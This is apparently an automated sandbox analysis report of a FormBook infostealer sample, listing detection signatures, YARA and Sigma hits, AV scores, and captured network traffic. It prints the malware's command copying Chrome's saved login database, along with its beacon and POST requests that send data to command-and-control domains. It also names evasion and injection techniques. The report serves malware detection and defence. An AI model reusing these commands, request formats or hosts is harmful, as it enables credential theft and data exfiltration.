Loading ...

Play interactive tourEdit tour

Analysis Report xg28sL5JDm.exe

Overview

General Information

Sample Name:xg28sL5JDm.exe
MD5:427c74cd09c5e3da8c9c9f3d5c1c126a
SHA1:59583b1abf57a9d1d01de013d864ec3c75d68938
SHA256:e082a8136dd0aa48cfefb68b6afb0878004c250f50900efddba892fc23c68500

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to resolve many domain names, but no domain seems valid
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Domain name seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x15749:$sqlite3step: 68 34 1C 7B E1
    • 0x1585c:$sqlite3step: 68 34 1C 7B E1
    • 0x15778:$sqlite3text: 68 38 2A 90 C5
    • 0x1589d:$sqlite3text: 68 38 2A 90 C5
    • 0x1578b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x158b3:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x12ae5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x125d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x12be7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x12d5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1184c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x17e37:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x18e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x15749:$sqlite3step: 68 34 1C 7B E1
      • 0x1585c:$sqlite3step: 68 34 1C 7B E1
      • 0x15778:$sqlite3text: 68 38 2A 90 C5
      • 0x1589d:$sqlite3text: 68 38 2A 90 C5
      • 0x1578b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x158b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 43 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.xg28sL5JDm.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.xg28sL5JDm.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x14949:$sqlite3step: 68 34 1C 7B E1
        • 0x14a5c:$sqlite3step: 68 34 1C 7B E1
        • 0x14978:$sqlite3text: 68 38 2A 90 C5
        • 0x14a9d:$sqlite3text: 68 38 2A 90 C5
        • 0x1498b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x14ab3:$sqlite3blob: 68 53 D8 7F 8C
        3.2.xg28sL5JDm.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x6448:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x66b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x11ce5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x117d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x11de7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x11f5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x722a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x10a4c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x7bc3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x17037:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1803a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        15.1.sdv88p2lg.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          15.1.sdv88p2lg.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x15749:$sqlite3step: 68 34 1C 7B E1
          • 0x1585c:$sqlite3step: 68 34 1C 7B E1
          • 0x15778:$sqlite3text: 68 38 2A 90 C5
          • 0x1589d:$sqlite3text: 68 38 2A 90 C5
          • 0x1578b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x158b3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 43 entries

          Sigma Overview


          System Summary:

          barindex
          Sigma detected: Steal Google chrome login dataShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\svchost.exe, ParentImage: C:\Windows\SysWOW64\svchost.exe, ParentProcessId: 5972, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 3252
          Sigma detected: Suspicious Svchost ProcessShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2928, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5972
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2928, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5972

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: xg28sL5JDm.exeAvira: detected
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exeAvira: detection malicious, Label: HEUR/AGEN.1046743
          Multi AV Scanner detection for domain / URLShow sources
          Source: www.allixanes.comVirustotal: Detection: 6%Perma Link
          Source: http://www.allixanes.com/ez3/Virustotal: Detection: 11%Perma Link
          Source: http://www.allixanes.comVirustotal: Detection: 6%Perma Link
          Source: http://www.tylermercer.net/ez3/Virustotal: Detection: 7%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exeVirustotal: Detection: 81%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exeMetadefender: Detection: 28%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exeReversingLabs: Detection: 90%
          Multi AV Scanner detection for submitted fileShow sources
          Source: xg28sL5JDm.exeVirustotal: Detection: 81%Perma Link
          Source: xg28sL5JDm.exeMetadefender: Detection: 28%Perma Link
          Source: xg28sL5JDm.exeReversingLabs: Detection: 90%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.1506249884.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2481462321.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.1503710394.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.1503886889.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.923330823.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.1.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.xg28sL5JDm.exe.2200000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.sdv88p2lg.exe.2600000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.xg28sL5JDm.exe.2200000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.sdv88p2lg.exe.2270000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.sdv88p2lg.exe.2270000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.xg28sL5JDm.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.sdv88p2lg.exe.2600000.3.unpack, type: UNPACKEDPE
          Source: 15.1.sdv88p2lg.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.xg28sL5JDm.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.1.xg28sL5JDm.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.xg28sL5JDm.exe.2200000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 15.2.sdv88p2lg.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 14.2.sdv88p2lg.exe.2270000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.svchost.exe.2d00000.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.xg28sL5JDm.exe.23e0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 14.2.sdv88p2lg.exe.2600000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 0_2_004051BC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_004051BC

          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 4x nop then mov ebx, 000014B9h0_2_00469CD0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 4x nop then push 00000000h0_2_00469CD0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 4x nop then mov eax, dword ptr [00475BF0h]0_2_00469CD0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 4x nop then mov dl, byte ptr [eax+0046BF64h]0_2_00469CD0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 4x nop then inc ebx0_2_00469CD0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00469C6C
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 4x nop then pop edi3_2_0040BB4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi5_2_0040BB4B
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 4x nop then mov eax, dword ptr [esi+34h]14_2_022B4705
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 4x nop then jmp 022B5F22h14_2_022B5766
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 4x nop then add edx, 02h14_2_022B7243
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 4x nop then mov dword ptr [ebp+10h], ebx14_2_022B3ED1
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exeCode function: 4x nop then call dword ptr [edi+000000F4h]14_2_022B282D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 4x nop then pop edi18_2_007ABB4B

          Networking:

          barindex
          Tries to resolve many domain names, but no domain seems validShow sources
          Source: unknownDNS traffic detected: query: www.tinbaofb.com replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.tatilultra.com replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.tqg6k4jl-0k8rlg.com replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.greenslandscapingllc.com replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.estereojerusalenfm.com replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.zqhanu.men replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.chestermerecalgaryhomes.info replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.oraning.net replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.hoops2life.net replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.vxstfh.men replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.jwc.bet replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.djhong.net replaycode: Name error (3)
          Source: Joe Sandbox ViewDomain Name: www.allixanes.com www.allixanes.com
          Source: global trafficHTTP traffic detected: GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1Host: www.pawlowski.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ez3/?dL3=oh/nSlzENG0qUOAwPXeIQOtwW6r8d6QREB9M6hBu+NM+9UHPsG9g+Ot2gFGRe3aStlqv&f2JLp=0ZWpXH1 HTTP/1.1Host: www.lcpierpontphotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ez3/?dL3=7CEQ+k742KWuCXQBHgFuLA7JV8UfVcRSEMIHryxdtZ0WgVQp3Q3kFEzSW7ScRDzGFE92&f2JLp=0ZWpXH1 HTTP/1.1Host: www.tylermercer.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ez3/?dL3=X3u3PzGnlM4B8cIThswW3+TZhgNWE0aZtyVvUn4Lv16SAoXv0FRCFRv3M3XIz91P9rzv&f2JLp=0ZWpXH1 HTTP/1.1Host: www.allixanes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1Host: www.pawlowski.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: global trafficHTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.lcpierpontphotography.comConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.lcpierpontphotography.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lcpierpontphotography.com/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 67 44 7a 64 4d 41 6d 55 4a 44 4e 43 4b 2d 73 32 4e 51 4f 57 43 49 52 6f 63 37 50 49 65 71 64 50 57 45 51 35 70 42 78 76 75 39 4d 5a 33 32 58 50 6a 6c 6c 35 75 61 51 6f 37 30 4b 56 59 55 61 47 34 55 54 37 36 58 37 66 44 55 58 32 7e 62 6e 63 79 61 61 49 45 4f 75 31 59 66 42 7a 35 61 77 6f 72 56 69 53 72 2d 35 7a 43 41 4c 70 4b 54 48 34 67 47 54 47 79 78 4e 39 47 43 6d 48 5a 68 6f 43 34 34 70 75 38 39 45 51 50 6d 42 7a 70 56 46 4c 72 49 6f 6c 55 5a 6e 4e 4a 44 56 4d 79 4c 56 59 74 46 42 75 47 7a 77 79 76 2d 45 45 58 57 34 51 59 66 38 56 33 7a 66 70 7a 6e 69 46 48 49 6f 71 62 4d 28 32 7e 4a 43 57 69 54 63 56 49 59 78 55 6b 67 73 53 31 71 6e 53 4e 5f 63 4b 43 4c 65 5a 5a 5f 39 6b 49 36 4f 41 59 75 72 39 67 58 6f 6c 46 78 61 5f 6f 6e 55 6c 4d 5a 53 6d 35 48 70 52 68 4d 54 41 28 39 76 59 52 4c 41 56 30 53 46 66 43 30 52 6e 4e 61 48 6c 42 53 7a 4f 7e 4c 4e 75 37 51 6c 7a 32 58 53 46 62 42 74 77 32 6d 65 44 6e 78 65 38 4c 52 67 37 7e 56 34 51 6a 4f 54 7a 59 4c 31 46 65 54 38 47 39 73 6f 30 45 73 70 76 39 41 6d 68 39 58 4b 43 4e 61 34 42 57 6b 55 74 56 77 4e 59 36 51 71 6f 38 37 72 56 31 6c 68 6d 72 34 38 32 57 37 33 5f 4c 51 70 5a 44 39 34 45 79 6a 72 69 51 31 48 5a 64 75 46 6d 59 44 48 76 42 34 48 59 66 52 43 59 77 62 7e 6c 72 34 7a 46 35 6d 69 74 6a 36 6a 6a 69 32 56 49 28 73 39 34 74 32 6f 45 6a 53 57 71 30 50 33 79 32 63 4d 59 58 33 48 61 51 61 5a 79 34 30 72 46 70 75 72 5a 71 6c 28 4f 4a 35 4e 5f 64 5a 47 6b 41 47 4d 32 30 77 4f 64 48 52 6e 6d 4a 4e 74 57 30 6c 66 74 71 31 6c 4b 65 45 65 74 4f 77 53 76 34 38 52 79 4c 71 41 7a 52 65 73 64 55 56 73 50 73 75 72 76 50 61 4a 66 45 47 6e 37 53 73 59 39 41 4a 39 6e 35 46 6b 44 59 58 6b 32 7e 50 4f 57 6b 6c 6c 56 6b 57 28 4f 4d 4a 54 4d 48 69 43 34 76 6b 34 35 52 58 6b 65 41 53 54 69 72 5f 28 37 64 73 59 53 7a 5a 59 4c 52 49 44 32 65 48 68 6a 42 35 63 45 46 6e 55 45 66 46 4a 31 34 53 4b 64 36 36 71 42 7e 79 6b 75 37 77 58 33 70 2d 38 6c 31 74 43 4d 73 6e 66 58 6a 46 5a 67 7e 78 35 72 28 64 69 31 44 4a 4f 50 71 65 79 53 6c 33 39 47 6f 31 4f 74 65 64 59 51 6c 63 63 2d 34 5a 41 52 43 52 31 6d 58 4b 7e 48 34 70 64 65 69 43 6a 41 45 63 61 37 45 72 75 57 28 64 78 4e 72 37 34 47 52 69 70 37 55 4d 4b 5f 44 62 4f 33 6d 77 6a 36 68 67 65 6b 67 6d 44 77 35 77 65 74 6b 52 7a 66 36 4f 6c 73 52 79 79 70 74 4e 74 72 6e 5f 62 49 30 44 50 52 69 6d 4f 58 67 42 78 49 64 78 5a 6b 76 63 61 54 31 6c 79 70 68 4c 61 4f 75 4e 71 5f 56 49 77 46 28 4c 44 70 54 42 51 44 6a 33 6e 53 32 5a 41 49 43 31 43 62 6d 49 65 4e 4a 6f 72 6f 59 7a 57 55 6a 45 67 63 77 4e 51 53 72 70 4c 69 6b 6a 36 4e 6b 5
          Source: global trafficHTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.tylermercer.netConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.tylermercer.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tylermercer.net/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 7a 67 49 71 67 45 4f 44 70 63 53 76 64 57 64 32 61 6e 6b 58 59 48 66 47 62 2d 6b 7a 53 59 46 34 42 6f 64 6b 36 69 56 47 68 4d 45 48 72 6e 4d 6f 34 77 36 4e 58 68 43 52 43 70 7a 41 64 44 37 30 59 6c 4a 36 30 32 30 32 51 55 38 5a 38 35 69 51 32 68 36 77 5a 6f 52 71 30 34 70 31 57 50 44 58 79 53 51 49 41 4b 53 7a 65 43 35 57 7a 6b 66 78 72 72 4c 48 64 31 65 35 44 68 6b 5f 35 58 55 47 28 4d 57 65 63 50 53 47 4b 43 64 49 57 6b 6a 66 6c 4b 54 48 4b 30 37 4e 34 42 49 6b 55 54 66 75 6a 43 6c 72 42 50 4e 67 66 73 77 6c 4c 57 4c 2d 62 30 6d 6a 55 47 66 64 50 59 41 41 51 45 35 48 67 32 46 63 78 77 28 54 61 6b 44 75 6f 65 6b 48 64 31 35 63 55 4e 47 79 53 4e 62 5f 46 5a 55 66 6b 6c 73 31 61 2d 51 6a 58 41 63 31 48 78 56 33 55 6c 49 48 70 38 49 74 6c 47 76 44 77 33 75 5a 44 4b 69 56 56 58 46 71 4e 6d 6c 38 6b 67 6e 77 77 4d 69 76 4f 53 34 4a 6a 56 4c 63 45 57 72 39 72 62 4e 41 47 5a 79 77 76 5a 49 63 76 65 42 31 59 58 50 74 43 51 43 71 43 73 65 52 37 58 6a 61 34 58 70 44 56 68 39 51 37 56 76 42 6c 38 79 73 31 70 47 55 32 70 38 34 7e 57 72 41 70 64 51 6b 6b 64 41 69 76 65 4e 5a 30 30 41 6c 4b 7a 77 37 5a 6a 45 53 52 79 31 5a 37 31 63 69 79 51 4c 4e 58 78 45 75 56 5a 6e 58 61 45 74 38 51 39 35 33 73 45 74 37 4f 48 32 4d 53 4a 44 34 4b 68 56 33 6d 66 37 35 68 78 48 56 48 6a 61 38 62 49 6e 56 39 4f 54 72 6d 72 71 75 47 6f 41 33 4a 46 38 2d 50 6b 76 67 75 6e 33 77 55 79 6b 67 78 36 63 69 63 6f 67 31 52 44 4d 30 49 4c 55 7a 36 64 4e 7a 58 4c 38 4f 6a 70 74 4c 72 48 4a 32 49 58 6c 46 46 63 74 35 6e 6d 4f 64 31 67 65 46 69 4e 41 36 63 61 62 76 63 66 69 2d 42 2d 66 41 4a 68 4d 68 6c 32 6b 58 35 53 41 78 6a 5f 77 38 41 63 55 36 62 46 73 74 74 47 30 42 37 50 79 7a 71 33 70 47 36 4d 44 35 74 46 72 45 67 65 72 51 47 58 31 49 33 32 6b 41 51 49 67 6f 36 76 66 6e 42 4a 4e 46 59 78 58 44 74 34 6f 48 34 78 38 38 75 5f 48 71 43 6f 4e 79 28 76 30 6a 57 7a 74 45 47 7a 6a 35 74 6d 47 65 76 59 63 5a 4c 69 39 37 59 76 6d 38 4c 6a 35 74 73 5f 54 47 44 56 76 52 68 54 57 58 7a 63 77 68 30 57 52 6a 4e 31 4a 4f 38 5a 6a 52 28 70 53 63 6b 5f 49 5a 78 35 73 41 34 76 33 4a 36 51 56 44 35 65 65 54 63 64 64 42 59 55 6f 37 73 39 70 68 78 46 4e 55 47 33 46 34 63 48 68 54 6e 6b 48 6c 49 5f 66 69 6b 72 70 4f 36 47 52 7a 74 61 7a 35 28 7a 73 63 41 7a 61 65 31 47 4c 4b 63 43 73 6d 41 66 57 33 48 5f 51 48 74 37 64 4c 50 47 32 58 4b 52 74 55 4a 5a 39 47 6c 58 35 57 6c 54 5a 32 4c 41 46 42 47 56 47 48 69 38 45 6d 49 75 46 2d 66 70 61 4f 51 2d 4f 36 4c 55 61 6a 52 51 54 48 7e 48 57 68 4a 37 6e 43 4e 56 37 4a 61 63 51 39 42 6c 7a 53 6e 6e 4c 6f 49 31 78 5f 45 4a 6f 68 43 44 61 32 4b 53 78 5
          Source: global trafficHTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.allixanes.comConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.allixanes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.allixanes.com/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 66 56 69 4e 52 56 4f 73 32 59 42 32 6e 50 67 2d 72 4c 49 4d 70 4f 62 74 70 6a 6c 61 47 33 57 4e 30 45 42 70 50 52 4d 63 72 77 75 75 4b 70 48 33 7a 31 6b 30 43 45 36 76 66 55 75 4b 34 38 46 78 72 6f 53 72 49 44 70 53 77 6f 58 71 36 5f 6b 5a 69 69 73 44 4e 64 61 41 62 36 66 64 28 4d 4a 50 4a 55 70 57 64 2d 4e 54 54 41 4e 2d 30 64 38 69 6f 55 41 75 32 4e 77 58 57 34 47 67 7a 44 56 41 4a 49 57 49 6a 64 77 39 77 62 49 79 34 66 48 76 77 2d 28 41 41 77 79 75 73 33 54 69 37 35 65 46 58 5f 71 59 52 47 47 4f 55 73 6e 45 